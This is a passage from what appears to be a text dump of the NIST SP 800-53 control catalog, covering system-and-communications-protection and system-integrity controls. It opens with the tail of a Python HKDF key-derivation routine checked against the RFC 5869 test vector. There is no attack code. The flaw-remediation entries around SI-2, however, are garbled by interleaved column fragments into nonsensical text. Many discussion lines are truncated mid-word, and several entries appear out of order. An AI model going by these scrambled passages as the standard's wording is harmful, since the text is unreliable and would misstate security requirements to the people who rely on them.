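    salt = bytes(range(0x00, 0x0D))        # 00 01 ... 0c
    info = bytes(range(0xF0, 0xFA))        # f0 f1 ... f9
    prk = hkdf_extract(salt, ikm)
    okm = hkdf_expand(prk, info, 42)
    return (prk.hex() == "077709362c2e32df0ddc3f0dc47bba6390b6c73bb50f9c3122ec844ad7c2b3e5"
            and okm.hex() == "3cb25f25faacd57a90434f64d0362f2a2d2d0a90cf1a5a4c5db02d56ecc4c5bf"
                             "34007208d5b887185865")


if __name__ == "__main__":
    print("RFC 5869 vector ok:", check_rfc5869_vector())
    keys = derive_session_keys(b"constructed shared secret", b"constructed salt", b"A->B|v1")
    print("enc:", keys["enc"].hex())
    print("mac:", keys["mac"].hex())
```

The point the catalog text makes in prose is visible in the code: the agreed secret is never used directly as a key, and changing the context (a different peer, a different protocol version) changes every derived key, which is what prevents key reuse across purposes.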
SC-12(6) Cryptographic Key Establishment and Management | Physical Control of Keys Maintain physical control of cryptographic keys when stored information is encrypted by external service providers. For organizations that use external service providers (e.g., cloud service or data center providers), physical control of cryptographic keys provides additional assurance that information stored by such external providers is not subject to unauthorized disclosure or modification. None.
SC-13 Cryptographic Protection a. Determine the [Assignment: organization-defined cryptographic uses]; and b. Implement the following types of cryptography required for each specified cryptographic use: [Assignment: organization-defined types of cryptography for each specified cryptographic use]. Cryptography can be employed to support a variety of security solutions, including the protection of AC-2, AC-3, AC-7, AC-17, AC-18, AC-19, AU-9, AU-10, CM-11, CP-9, IA-3, IA-5, IA-7, MA-4, MP-2, MP-4, MP-5, SA-4, SA-8, SA-9, SC-8, SC-12, SC-20, SC-23, SC-28, SC-40, SI-3, SI-7.
SC-15(2) Collaborative Computing Devices and Applications | Blocking Inbound and Outbound Communications Traffic [Withdrawn: Incorporated into SC-7.]
SC-19 Voice Over Internet Protocol [Withdrawn: Technology-specific; addressed as any other technology or protocol.]
SC-20(1) Secure Name/address Resolution Service (authoritative Source) | Child Subspaces [Withdrawn: Incorporated into SC-20.]
SC-21(1) Secure Name/address Resolution Service (recursive or Caching Resolver) | Data Origin and Integrity [Withdrawn: Incorporated into SC-21.]
SC-23(2) Session Authenticity | User-initiated Logouts and Message Displays [Withdrawn: Incorporated into AC-12(1).]
SC-15 Collaborative Computing Devices and Applications a. Prohibit remote activation of collaborative computing devices and applications with the following exceptions: [Assignment: organization-defined exceptions where remote activation is to be allowed]; and Collaborative computing devices and applications include remote meeting devices and applications, n AC-21, SC-42.
SC-15(1) Collaborative Computing Devices and Applications | Physical or Logical Disconnect Provide [Selection (one or more): physical; logical] disconnect of collaborative computing devices in a manner that supports ease of use. Failing to disconnect from collaborative computing devices can result in subsequent compromises of organizational information. Providing easy methods to disconnect from such devices after a collaborative computing session ensures that participants carry out the disconnect activity without having to go through complex and tedious procedures. Disconnect from collaborative computing None.
SC-23(4) Session Authenticity | Unique Session Identifiers with Randomization [Withdrawn: Incorporated into SC-23(3).]
SC-15(3) Collaborative Computing Devices and Applications | Disabling and Removal in Secure Work Areas Disable or remove collaborative computing devices and applications from [Assignment: organization-defined systems or system components] in [Assignment: organization-defined secure work areas]. Failing to disable or remove collaborative computing devices and applications from systems or system components can result in compromises of information, including eavesdropping on conversations. A Sensitive Compartmented Information Facility (SCIF) is an example of a secure work area. None.

11 of 2021-01-21

SC-15(4) Collaborative Computing Devices and Applications | Explicitly Indicate Current Participants
  Control Text: Provide an explicit indication of current participants in [Assignment: organization-defined online meetings and teleconferences].
  Discussion: Explicitly indicating current participants prevents unauthorized individuals from participating in collaborative computing sessions without the explicit knowledge of other participants.
  Related Controls: None.

SC-16 Transmission of Security and Privacy Attributes
  Control Text: Associate [Assignment: organization-defined security and privacy attributes] with information ex
  Discussion: Security and privacy attributes can be explicitly or implicitly associated with the information contain
  Related Controls: AC-3, AC-4, AC-16.

SC-16(1) Transmission of Security and Privacy Attributes | Integrity Verification
  Control Text: Verify the integrity of transmitted security and privacy attributes.
  Discussion: Part of verifying the integrity of transmitted information is ensuring that security and privacy attri
  Related Controls: AU-10, SC-8.

SC-16(2) Transmission of Security and Privacy Attributes | Anti-spoofing Mechanisms
  Control Text: Implement anti-spoofing mechanisms to prevent adversaries from falsifying the security attributes indi
  Discussion: Some attack vectors operate by altering the security attributes of an information system to intentiona
  Related Controls: SI-3, SI-4, SI-7.

SC-16(3) Transmission of Security and Privacy Attributes | Cryptographic Binding
  Control Text: Implement [Assignment: organization-defined mechanisms or techniques] to bind security and privacy
  Discussion: Cryptographic mechanisms and techniques can provide strong security and privacy attribute binding t
  Related Controls: AC-16, SC-12, SC-13.

SC-17 Public Key Infrastructure Certificates
  Control Text: a. Issue public key certificates under an [Assignment: organization-defined certificate policy] or obtain public key certificates from an approved service provider; and
  Discussion: Public key infrastructure (PKI) certificates are certificates with visibility external to organizational s
  Related Controls: AU-10, IA-5, SC-12.

SC-18 Mobile Code
  Control Text: a. Define acceptable and unacceptable mobile code and mobile code technologies; and b. Authorize, monitor, and control the use of mobile code within the system.
  Discussion: Mobile code includes any program, application, or content that can be transmitted across a network
  Related Controls: AU-2, AU-12, CM-2, CM-6, SI-3.

SC-18(1) Mobile Code | Identify Unacceptable Code and Take Corrective Actions
  Control Text: Identify [Assignment: organization-defined unacceptable mobile code] and take [Assignment: organization-defined corrective actions].
  Discussion: Corrective actions when unacceptable mobile code is detected include blocking, quarantine, or alerting administrators. Blocking includes preventing the transmission of word processing files with embedded macros when such macros have been determined to be unacceptable mobile code.
  Related Controls: None.

SC-18(2) Mobile Code | Acquisition, Development, and Use
  Control Text: Verify that the acquisition, development, and use of mobile code to be deployed in the system meets [Assignment: organization-defined mobile code requirements].
  Discussion: None.
  Related Controls: None.

SC-18(3) Mobile Code | Prevent Downloading and Execution
  Control Text: Prevent the download and execution of [Assignment: organization-defined unacceptable mobile code].
  Discussion: None.
  Related Controls: None.

SC-18(4) Mobile Code | Prevent Automatic Execution
  Control Text: Prevent the automatic execution of mobile code in [Assignment: organization-defined software applications] and enforce [Assignment: organization-defined actions] prior to executing the code.
  Discussion: Actions enforced before executing mobile code include prompting users prior to opening email attachments or clicking on web links. Preventing the automatic execution of mobile code includes disabling auto-execute features on system components that employ portable storage devices, such as compact discs, digital versatile discs, and universal serial bus devices.
  Related Controls: None.

SC-18(5) Mobile Code | Allow Execution Only in Confined Environments
  Control Text: Allow execution of permitted mobile code only in confined virtual machine environments.
  Discussion: Permitting the execution of mobile code only in confined virtual machine environments helps preven
  Related Controls: SC-44, SI-7.

SC-26(1) Decoys | Detection of Malicious Code
  Control Text: [Withdrawn: Incorporated into SC-35.]
SC-20 Secure Name/address Resolution Service (authoritative Source)
  Control Text: a. Provide additional data origin authentication and integrity verification artifacts along with the authoritative name resolution data the system returns in response to external name/address resolution queries; and
  Discussion: Providing authoritative source information enables external clients, including remote Internet clien
  Related Controls: AU-10, SC-8, SC-12, SC-13, SC-21, SC-22.

SC-30(1) Concealment and Misdirection | Virtualization Techniques
  Control Text: [Withdrawn: Incorporated into SC-29(1).]

SC-20(2) Secure Name/address Resolution Service (authoritative Source) | Data Origin and Integrity
  Control Text: Provide data origin and integrity protection artifacts for internal name/address resolution queries.
  Discussion: None.
  Related Controls: None.

SC-21 Secure Name/address Resolution Service (recursive or Caching Resolver)
  Control Text: Request and perform data origin authentication and data integrity verification on the name/address
  Discussion: Each client of name resolution services either performs this validation on its own or has authentica
  Related Controls: SC-20, SC-22.

SC-33 Transmission Preparation Integrity
  Control Text: [Withdrawn: Incorporated into SC-8.]

SC-22 Architecture and Provisioning for Name/address Resolution Service
  Control Text: Ensure the systems that collectively provide name/address resolution service for an organization are
  Discussion: Systems that provide name and address resolution services include domain name system (DNS) servers. T
  Related Controls: SC-2, SC-20, SC-21, SC-24.

SC-23 Session Authenticity
  Control Text: Protect the authenticity of communications sessions.
  Discussion: Protecting session authenticity addresses communications protection at the session level, not at the p
  Related Controls: AU-10, SC-8, SC-10, SC-11.

SC-23(1) Session Authenticity | Invalidate Session Identifiers at Logout
  Control Text: Invalidate session identifiers upon user logout or other session termination.
  Discussion: Invalidating session identifiers at logout curtails the ability of adversaries to capture and continue to employ previously valid session IDs.
  Related Controls: None.

SC-34(3) Non-modifiable Executable Programs | Hardware-based Protection
  Control Text: [Withdrawn: Moved to SC-51.]

SC-23(3) Session Authenticity | Unique System-generated Session Identifiers
  Control Text: Generate a unique session identifier for each session with [Assignment: organization-defined random
  Discussion: Generating unique session identifiers curtails the ability of adversaries to reuse previously valid ses
  Related Controls: AC-10, SC-12, SC-13.

SC-4(1) Information in Shared System Resources | Security Levels
  Control Text: [Withdrawn: Incorporated into SC-4.]

SC-23(5) Session Authenticity | Allowed Certificate Authorities
  Control Text: Only allow the use of [Assignment: organization-defined certificate authorities] for verification of th
  Discussion: Reliance on certificate authorities for the establishment of secure sessions includes the use of Transpo
  Related Controls: SC-12, SC-13.

SC-24 Fail in Known State
  Control Text: Fail to a [Assignment: organization-defined known system state] for the following failures on the in
  Discussion: Failure in a known state addresses security concerns in accordance with the mission and business needs
  Related Controls: CP-2, CP-4, CP-10, CP-12, SA-8, SC-7, SC-22, SI-13.

SC-25 Thin Nodes
  Control Text: Employ minimal functionality and information storage on the following system components: [Assign
  Discussion: The deployment of system components with minimal functionality reduces the need to secure every end
  Related Controls: SC-30, SC-44.

SC-26 Decoys
  Control Text: Include components within organizational systems specifically designed to be the target of malicious a
  Discussion: Decoys (i.e., honeypots, honeynets, or deception nets) are established to attract adversaries and de
  Related Controls: RA-5, SC-7, SC-30, SC-35, SC-44, SI-3, SI-4.

SC-42(3) Sensor Capability and Data | Prohibit Use of Devices
  Control Text: [Withdrawn: Incorporated into SC-42.]

SC-27 Platform-independent Applications
  Control Text: Include within organizational systems the following platform independent applications: [Assignment:
  Discussion: Platforms are combinations of hardware, firmware, and software components used to execute software ap
  Related Controls: SC-29.

SC-28 Protection of Information at Rest
  Control Text: Protect the [Selection (one or more): confidentiality; integrity] of the following information at rest:
  Discussion: Information at rest refers to the state of information when it is not in process or in transit and is
  Related Controls: AC-3, AC-4, AC-6, AC-19, CA-7, CM-3, CM-5, CM-6, CP-9, MP-4, MP-5, PE-3, SC-8, SC-12, SC-13, SC-34, SI-3, SI-7, SI-16.

SC-28(1) Protection of Information at Rest | Cryptographic Protection
  Control Text: Implement cryptographic mechanisms to prevent unauthorized disclosure and modification of the fol
  Discussion: The selection of cryptographic mechanisms is based on the need to protect the confidentiality and int
  Related Controls: AC-19, SC-12, SC-13.
SC-28(2) Protection of Information at Rest | Offline Storage
  Control Text: Remove the following information from online storage and store offline in a secure location: [Assignment: organization-defined information].
  Discussion: Removing organizational information from online storage to offline storage eliminates the possibility of individuals gaining unauthorized access to the information through a network. Therefore, organizations may choose to move information to offline storage in lieu of protecting such information in online storage.
  Related Controls: None.

SC-28(3) Protection of Information at Rest | Cryptographic Keys
  Control Text: Provide protected storage for cryptographic keys [Selection: [Assignment: organization-defined safe
  Discussion: A Trusted Platform Module (TPM) is an example of a hardware-protected data store that can be used
  Related Controls: SC-12, SC-13.

SC-29 Heterogeneity
  Control Text: Employ a diverse set of information technologies for the following system components in the imple
  Discussion: Increasing the diversity of information technologies within organizational systems reduces the impac
  Related Controls: AU-9, PL-8, SC-27, SC-30, SR-3.

SC-29(1) Heterogeneity | Virtualization Techniques
  Control Text: Employ virtualization techniques to support the deployment of a diversity of operating systems and applications that are changed [Assignment: organization-defined frequency].
  Discussion: While frequent changes to operating systems and applications can pose significant configuration management challenges, the changes can result in an increased work factor for adversaries to conduct successful attacks. Changing virtual operating systems or applications, as opposed to changing actual operating systems or applications, provides virtual changes that impede attacker
  Related Controls: None.

SC-30 Concealment and Misdirection
  Control Text: Employ the following concealment and misdirection techniques for [Assignment: organization-defined
  Discussion: Concealment and misdirection techniques can significantly reduce the targeting capabilities of adve
  Related Controls: AC-6, SC-25, SC-26, SC-29, SC-44, SI-14.

SC-7(1) Boundary Protection | Physically Separated Subnetworks
  Control Text: [Withdrawn: Incorporated into SC-7.]
SC-30(2) Concealment and Misdirection | Randomness
  Control Text: Employ [Assignment: organization-defined techniques] to introduce randomness into organizational operations and assets.
  Discussion: Randomness introduces increased levels of uncertainty for adversaries regarding the actions that organizations take to defend their systems against attacks. Such actions may impede the ability of adversaries to correctly target information resources of organizations that support critical missions or business functions. Uncertainty may also cause adversaries to hesitate before initiating or
  Related Controls: None.

SC-30(3) Concealment and Misdirection | Change Processing and Storage Locations
  Control Text: Change the location of [Assignment: organization-defined processing and/or storage] [Selection: [Assignment: organization-defined time frequency]; at random time intervals]].
  Discussion: Adversaries target critical mission and business functions and the systems that support those mission and business functions while also trying to minimize the exposure of their existence and tradecraft. The static, homogeneous, and deterministic nature of organizational systems targeted by adversaries make such systems more susceptible to attacks with less adversary cost and effort to
  Related Controls: None.

SC-30(4) Concealment and Misdirection | Misleading Information
  Control Text: Employ realistic, but misleading information in [Assignment: organization-defined system components] about its security state or posture.
  Discussion: Employing misleading information is intended to confuse potential adversaries regarding the nature and extent of controls deployed by organizations. Thus, adversaries may employ incorrect and ineffective attack techniques. One technique for misleading adversaries is for organizations to place misleading information regarding the specific controls deployed in external systems that are known
  Related Controls: None.

SC-30(5) Concealment and Misdirection | Concealment of System Components
  Control Text: Employ the following to hide or conceal [Assignment: organization-defined system components]: [Assignment: organization-defined techniques].
  Discussion: By hiding, disguising, or concealing critical system components, organizations may be able to decrease the probability that adversaries target and successfully compromise those assets. Potential means to hide, disguise, or conceal system components include the configuration of routers or the use of encryption or virtualization techniques.
  Related Controls: None.

SC-31 Covert Channel Analysis
  Control Text: a. Perform a covert channel analysis to identify those aspects of communications within the system that are potential avenues for covert [Selection (one or more): storage; timing] channels; and
  Discussion: Developers are in the best position to identify potential areas within systems that might lead to cove
  Related Controls: AC-3, AC-4, SA-8, SI-11.

SC-31(1) Covert Channel Analysis | Test Covert Channels for Exploitability
  Control Text: Test a subset of the identified covert channels to determine the channels that are exploitable.
  Discussion: None.
  Related Controls: None.
SC-31(2) Covert Channel Analysis | Maximum Bandwidth
  Control Text: Reduce the maximum bandwidth for identified covert [Selection (one or more): storage; timing] channels to [Assignment: organization-defined values].
  Discussion: The complete elimination of covert channels, especially covert timing channels, is usually not possible without significant performance impacts.
  Related Controls: None.

SC-31(3) Covert Channel Analysis | Measure Bandwidth in Operational Environments
  Control Text: Measure the bandwidth of [Assignment: organization-defined subset of identified covert channels] in the operational environment of the system.
  Discussion: Measuring covert channel bandwidth in specified operational environments helps organizations determine how much information can be covertly leaked before such leakage adversely affects mission or business functions. Covert channel bandwidth may be significantly different when measured in settings that are independent of the specific environments of operation, including
  Related Controls: None.

SC-32 System Partitioning
  Control Text: Partition the system into [Assignment: organization-defined system components] residing in separate
  Discussion: System partitioning is part of a defense-in-depth protection strategy. Organizations determine the d
  Related Controls: AC-4, AC-6, SA-8, SC-2, SC-3, SC-7, SC-36.

SC-32(1) System Partitioning | Separate Physical Domains for Privileged Functions
  Control Text: Partition privileged functions into separate physical domains.
  Discussion: Privileged functions that operate in a single physical domain may represent a single point of failure if that domain becomes compromised or experiences a denial of service.
  Related Controls: None.

SC-7(2) Boundary Protection | Public Access
  Control Text: [Withdrawn: Incorporated into SC-7.]
SC-34 Non-modifiable Executable Programs
  Control Text: For [Assignment: organization-defined system components], load and execute: a. The operating environment from hardware-enforced, read-only media; and
  Discussion: The operating environment for a system contains the code that hosts applications, including operatin
  Related Controls: AC-3, SI-7, SI-14.

SC-34(1) Non-modifiable Executable Programs | No Writable Storage
  Control Text: Employ [Assignment: organization-defined system components] with no writeable storage that is per
  Discussion: Disallowing writeable storage eliminates the possibility of malicious code insertion via persistent, w
  Related Controls: AC-19, MP-7.

SC-34(2) Non-modifiable Executable Programs | Integrity Protection on Read-only Media
  Control Text: Protect the integrity of information prior to storage on read-only media and control the media afte
  Discussion: Controls prevent the substitution of media into systems or the reprogramming of programmable read-on
  Related Controls: CM-3, CM-5, CM-9, MP-2, MP-4, MP-5, SC-28, SI-3.

SC-7(6) Boundary Protection | Response to Recognized Failures
  Control Text: [Withdrawn: Incorporated into SC-7(18).]

SC-35 External Malicious Code Identification
  Control Text: Include system components that proactively seek to identify network-based malicious code or malici
  Discussion: External malicious code identification differs from decoys in SC-26 in that the components actively p
  Related Controls: SC-7, SC-26, SC-44, SI-3, SI-4.

SC-36 Distributed Processing and Storage
  Control Text: Distribute the following processing and storage components across multiple [Selection: physical loc
  Discussion: Distributing processing and storage across multiple physical locations or logical domains provides a
  Related Controls: CP-6, CP-7, PL-8, SC-32.

SC-36(1) Distributed Processing and Storage | Polling Techniques
  Control Text: (a) Employ polling techniques to identify potential faults, errors, or compromises to the following processing and storage components: [Assignment: organization-defined distributed processing and storage components]; and
  Discussion: Distributed processing and/or storage may be used to reduce opportunities for adversaries to compro
  Related Controls: SI-4.

SC-36(2) Distributed Processing and Storage | Synchronization
  Control Text: Synchronize the following duplicate systems or system components: [Assignment: organization-defi
  Discussion: SC-36 and CP-9(6) require the duplication of systems or system components in distributed locations.
  Related Controls: CP-9.

SC-37 Out-of-band Channels
  Control Text: Employ the following out-of-band channels for the physical delivery or electronic transmission of [
  Discussion: Out-of-band channels include local, non-network accesses to systems; network paths physically separa
  Related Controls: AC-2, CM-3, CM-5, CM-7, IA-2, IA-4, IA-5, MA-4, SC-12, SI-3, SI-4, SI-7.

SC-37(1) Out-of-band Channels | Ensure Delivery and Transmission
  Control Text: Employ [Assignment: organization-defined controls] to ensure that only [Assignment: organization-defined individuals or systems] receive the following information, system components, or devices: [Assignment: organization-defined information, system components, or devices].
  Discussion: Techniques employed by organizations to ensure that only designated systems or individuals receive certain information, system components, or devices include sending authenticators via an approved courier service but requiring recipients to show some form of government-issued photographic identification as a condition of receipt.
  Related Controls: None.

SC-38 Operations Security
  Control Text: Employ the following operations security controls to protect key organizational information througho
  Discussion: Operations security (OPSEC) is a systematic process by which potential adversaries can be denied infor
  Related Controls: CA-2, CA-7, PL-1, PM-9, PM-12, RA-2, RA-3, RA-5, SC-7, SR-3, SR-7.

SC-39 Process Isolation
  Control Text: Maintain a separate execution domain for each executing system process.
  Discussion: Systems can maintain separate execution domains for each executing process by assigning each proces
  Related Controls: AC-3, AC-4, AC-6, AC-25, SA-8, SC-2, SC-3, SI-16.

SC-39(1) Process Isolation | Hardware Separation
  Control Text: Implement hardware separation mechanisms to facilitate process isolation.
  Discussion: Hardware-based separation of system processes is generally less susceptible to compromise than software-based separation, thus providing greater assurance that the separation will be enforced. Hardware separation mechanisms include hardware memory management.
  Related Controls: None.

SC-39(2) Process Isolation | Separate Execution Domain Per Thread
  Control Text: Maintain a separate execution domain for each thread in [Assignment: organization-defined multi-threaded processing].
  Discussion: None.
  Related Controls: None.
SC-40 Wireless Link Protection
  Control Text: Protect external and internal [Assignment: organization-defined wireless links] from the following si
  Discussion: Wireless link protection applies to internal and external wireless communication links that may be vis
  Related Controls: AC-18, SC-5.

SC-40(1) Wireless Link Protection | Electromagnetic Interference
  Control Text: Implement cryptographic mechanisms that achieve [Assignment: organization-defined level of protectio
  Discussion: The implementation of cryptographic mechanisms for electromagnetic interference protects systems ag
  Related Controls: PE-21, SC-12, SC-13.

SC-40(2) Wireless Link Protection | Reduce Detection Potential
  Control Text: Implement cryptographic mechanisms to reduce the detection potential of wireless links to [Assignmen
  Discussion: The implementation of cryptographic mechanisms to reduce detection potential is used for covert comm
  Related Controls: SC-12, SC-13.

SC-40(3) Wireless Link Protection | Imitative or Manipulative Communications Deception
  Control Text: Implement cryptographic mechanisms to identify and reject wireless transmissions that are delibera
  Discussion: The implementation of cryptographic mechanisms to identify and reject imitative or manipulative com
  Related Controls: SC-12, SC-13, SI-4.

SC-40(4) Wireless Link Protection | Signal Parameter Identification
  Control Text: Implement cryptographic mechanisms to prevent the identification of [Assignment: organization-defin
  Discussion: The implementation of cryptographic mechanisms to prevent the identification of wireless transmitters
  Related Controls: SC-12, SC-13.

SC-41 Port and I/O Device Access
  Control Text: [Selection: Physically; Logically] disable or remove [Assignment: organization-defined connection p
  Discussion: Connection ports include Universal Serial Bus (USB), Thunderbolt, and Firewire (IEEE 1394). Input/outp
  Related Controls: AC-20, MP-7.

SC-42 Sensor Capability and Data
  Control Text: a. Prohibit [Selection (one or more): the use of devices possessing [Assignment: organization-defined environmental sensing capabilities] in [Assignment: organization-defined facilities, areas, or systems]; the remote activation of environmental sensing capabilities on organizational systems or system components with the following exceptions: [Assignment: organization-defined exceptions
  Discussion: Sensor capability and data applies to types of systems or system components characterized as mobile d
  Related Controls: SC-15.

SC-42(1) Sensor Capability and Data | Reporting to Authorized Individuals or Roles
  Control Text: Verify that the system is configured so that data or information collected by the [Assignment: organization-defined sensors] is only reported to authorized individuals or roles.
  Discussion: In situations where sensors are activated by authorized individuals, it is still possible that the data or information collected by the sensors will be sent to unauthorized entities.
  Related Controls: None.

SC-42(2) Sensor Capability and Data | Authorized Use
  Control Text: Employ the following measures so that data or information collected by [Assignment: organization-de
  Discussion: Information collected by sensors for a specific authorized purpose could be misused for some unauthor
  Related Controls: PT-2.

SC-9 Transmission Confidentiality
  Control Text: [Withdrawn: Incorporated into SC-8.]

SC-42(4) Sensor Capability and Data | Notice of Collection
  Control Text: Employ the following measures to facilitate an individual’s awareness that personally identifiable in
  Discussion: Awareness that organizational sensors are collecting data enables individuals to more effectively enga
  Related Controls: PT-1, PT-4, PT-5.

SC-42(5) Sensor Capability and Data | Collection Minimization
  Control Text: Employ [Assignment: organization-defined sensors] that are configured to minimize the collection of
  Discussion: Although policies to control for authorized use can be applied to information once it is collected, mini
  Related Controls: SA-8, SI-12.

SC-43 Usage Restrictions
  Control Text: a. Establish usage restrictions and implementation guidelines for the following system components: [Assignment: organization-defined system components]; and
  Discussion: Usage restrictions apply to all system components including but not limited to mobile code, mobile d
  Related Controls: AC-18, AC-19, CM-6, SC-7, SC-18.

SC-44 Detonation Chambers
  Control Text: Employ a detonation chamber capability within [Assignment: organization-defined system, system co
  Discussion: Detonation chambers, also known as dynamic execution environments, allow organizations to open ema
  Related Controls: SC-7, SC-18, SC-25, SC-26, SC-30, SC-35, SC-39, SI-3, SI-7.

SC-45 System Time Synchronization
  Control Text: Synchronize system clocks within and between systems and system components.
  Discussion: Time synchronization of system clocks is essential for the correct execution of many system services
  Related Controls: AC-3, AU-8, IA-2, IA-8.

SC-45(1) System Time Synchronization | Synchronization with Authoritative Time Source
  Control Text: (a) Compare the internal system clocks [Assignment: organization-defined frequency] with [Assignment: organization-defined authoritative time source]; and
  Discussion: Synchronization of internal system clocks with an authoritative source provides uniformity of time stamps for systems with multiple system clocks and systems connected over a network.
  Related Controls: None.

SC-45(2) System Time Synchronization | Secondary Authoritative Time Source
  Control Text: (a) Identify a secondary authoritative time source that is in a different geographic region than the primary authoritative time source; and
  Discussion: It may be necessary to employ geolocation information to determine that the secondary authoritative time source is in a different geographic region.
  Related Controls: None.

SC-46 Cross Domain Policy Enforcement
  Control Text: Implement a policy enforcement mechanism [Selection: physically; logically] between the physical an
  Discussion: For logical policy enforcement mechanisms, organizations avoid creating a logical path between inte
  Related Controls: AC-4, SC-7.

SC-47 Alternate Communications Paths
  Control Text: Establish [Assignment: organization-defined alternate communications paths] for system operations
  Discussion: An incident, whether adversarial- or nonadversarial-based, can disrupt established communications pa
  Related Controls: CP-2, CP-8.

SC-48 Sensor Relocation
  Control Text: Relocate [Assignment: organization-defined sensors and monitoring capabilities] to [Assignment: org
  Discussion: Adversaries may take various paths and use different approaches as they move laterally through an orga
  Related Controls: AU-2, SC-7, SI-4.

SC-48(1) Sensor Relocation | Dynamic Relocation of Sensors or Monitoring Capabilities
  Control Text: Dynamically relocate [Assignment: organization-defined sensors and monitoring capabilities] to [Assignment: organization-defined locations] under the following conditions or circumstances: [Assignment: organization-defined conditions or circumstances].
  Discussion: None.
  Related Controls: None.

SC-49 Hardware-enforced Separation and Policy Enforcement
  Control Text: Implement hardware-enforced separation and policy enforcement mechanisms between [Assignment:
  Discussion: System owners may require additional strength of mechanism and robustness to ensure domain separ
  Related Controls: AC-4, SA-8, SC-50.

SC-50 Software-enforced Separation and Policy Enforcement
  Control Text: Implement software-enforced separation and policy enforcement mechanisms between [Assignment:
  Discussion: System owners may require additional strength of mechanism to ensure domain separation and policy
  Related Controls: AC-3, AC-4, SA-8, SC-2, SC-3, SC-49.

SC-51 Hardware-based Protection
  Control Text: a. Employ hardware-based, write-protect for [Assignment: organization-defined system firmware components]; and
  Discussion: None.
  Related Controls: None.


SI-1 Policy and Procedures a. Develop, document, and disseminate to [Assignment: organization-defined personnel or roles]: System and information integrity policy and procedures address the controls in the SI family that are PM-9, PS-8, SA-8, SI-12.
SI-2 Flaw Remediation 1. [Selectionreport,
a. Identify, (one or and more): Organization-level;
correct system flaws; Mission/business process-level; System-level] The need to remediate system flaws applies to all types of software and firmware. Organizations CA-5, CM-3, CM-4, CM-5, CM-6, CM-8, MA-2, RA-5, SA-8, SA-10, SA-11, SI-3, SI-5, SI-7, SI-
system
b. and information
Test software integrity
and firmware policy related
that: to flaw remediation for effectiveness and potential identify systems affected by software flaws, including potential vulnerabilities resulting from those 11.
SI-13(2) Predictable Failure Prevention | Time Limit on Process Execution Without Supervision [Withdrawn: Incorporated intoupdates
SI-7(16).]
side effects before installation; flaws, and report this information to designated organizational personnel with information security
SI-2(2) Flaw Remediation | Automated Flaw Remediation Status Determine if system components have applicable security-relevant software and firmware updates inAutomated and privacy mechanisms
responsibilities. canSecurity-relevant
track and determine updates the status
include ofpatches,
known flaws service forpacks,
systemand components.
malicious CA-7, SI-4.
SI-2(3) Flaw Remediation | Time to Remediate Flaws and Benchmarks for Corrective Actions (a) Measure the time between flaw identification and flaw remediation; and Organizations determine the time it takes on average to correct system flaws after such flaws have None.
SI-2(4) Flaw Remediation | Automated Patch Management Tools (b) Establish
Employ the following
automated benchmarks for
patch management taking
tools corrective
to facilitate flawactions: [Assignment:
remediation organization-
to the following been identified
system Using automated and subsequently
tools to support establish organizational
patch management helps benchmarks
SI-2(3), continued
Control (end): ... [Assignment: organization-defined benchmarks].
Discussion (end): ... (i.e., time frames) for taking corrective actions. Benchmarks can be established by the type of flaw or the severity of the potential vulnerability if the flaw can be exploited.
Related Controls: None.

SI-2(4), continued
Control (end): ... components: [Assignment: organization-defined system components].
Discussion (end): ... to ensure the timeliness and completeness of system patching operations.
Related Controls: None.

SI-2(1) Flaw Remediation | Central Management
Control: [Withdrawn: Incorporated into PL-9.]

SI-2(5) Flaw Remediation | Automatic Software and Firmware Updates
Control: Install [Assignment: organization-defined security-relevant software and firmware updates] automatically to [Assignment: organization-defined system components].
Discussion: Due to system integrity and availability concerns, organizations consider the methodology used to carry out automatic updates. Organizations balance the need to ensure that the updates are installed as soon as possible with the need to maintain configuration management and control with any mission or operational impacts that automatic updates might impose.
Related Controls: None.

SI-2(6) Flaw Remediation | Removal of Previous Versions of Software and Firmware
Control: Remove previous versions of [Assignment: organization-defined software and firmware components] after updated versions have been installed.
Discussion: Previous versions of software or firmware components that are not removed from the system after updates have been installed may be exploited by adversaries. Some products may automatically remove previous versions of software and firmware from the system.
Related Controls: None.

SI-3 Malicious Code Protection
Control: a. Implement [Selection (one or more): signature based; non-signature based] malicious code protection mechanisms at system entry and exit points to detect and eradicate malicious code;
Discussion: System entry and exit points include firewalls, remote access servers, workstations, electronic mail servers, web servers, proxy servers, notebook computers, and mobile devices. Malicious code includes viruses, worms, Trojan horses, and spyware. Malicious code can also be encoded in various formats contained within compressed or hidden files or hidden in files using techniques such as steganography.
Related Controls: AC-4, AC-19, CM-3, CM-8, IR-4, MA-3, MA-4, PL-9, RA-5, SC-7, SC-23, SC-26, SC-28, SC-44, SI-2, SI-4, SI-7, SI-8, SI-15.

SI-3(1) Malicious Code Protection | Central Management
Control: [Withdrawn: Incorporated into PL-9.]

SI-3(2) Malicious Code Protection | Automatic Updates
Control: [Withdrawn: Incorporated into SI-3.]

SI-3(3) Malicious Code Protection | Non-privileged Users
Control: [Withdrawn: Incorporated into AC-6(10).]

SI-3(4) Malicious Code Protection | Updates Only by Privileged Users
Control: Update malicious code protection mechanisms only when directed by a privileged user.
Discussion: Protection mechanisms for malicious code are typically categorized as security-related software and, as such, are only updated by organizational personnel with appropriate access privileges.
Related Controls: CM-5.

SI-3(5) Malicious Code Protection | Portable Storage Devices
Control: [Withdrawn: Incorporated into MP-7.]

SI-3(6) Malicious Code Protection | Testing and Verification
Control: (a) Test malicious code protection mechanisms [Assignment: organization-defined frequency] by introducing known benign code into the system; and
Discussion: None.
Related Controls: CA-2, CA-7, RA-5.

SI-3(7) Malicious Code Protection | Nonsignature-based Detection
Control: [Withdrawn: Incorporated into SI-3.]

SI-3(8) Malicious Code Protection | Detect Unauthorized Commands
Control: (a) Detect the following unauthorized operating system commands through the kernel application programming interface on [Assignment: organization-defined system hardware components]: [Assignment: organization-defined unauthorized operating system commands]; and
Discussion: Detecting unauthorized commands can be applied to critical interfaces other than kernel-based interfaces.
Related Controls: AU-2, AU-6, AU-12.
SI-3(10) Malicious Code Protection | Malicious Code Analysis
Control: (a) Employ the following tools and techniques to analyze the characteristics and behavior of malicious code: [Assignment: organization-defined tools and techniques]; and
Discussion: The use of malicious code analysis tools provides organizations with a more in-depth understanding of adversary tradecraft (i.e., tactics, techniques, and procedures) and the functionality and purpose of specific instances of malicious code. Understanding the characteristics of malicious code facilitates effective organizational responses to current and future threats.
Related Controls: None.

SI-4 System Monitoring
Control: a. Monitor the system to detect: 1. Attacks and indicators of potential attacks in accordance with the following monitoring objectives: [Assignment: organization-defined monitoring objectives]; and
Discussion: System monitoring includes external and internal monitoring. External monitoring includes the observation of events occurring at external interfaces to the system. Internal monitoring includes the observation of events occurring within the system. Organizations monitor systems by observing audit activities in real time or by observing other system aspects such as access patterns.
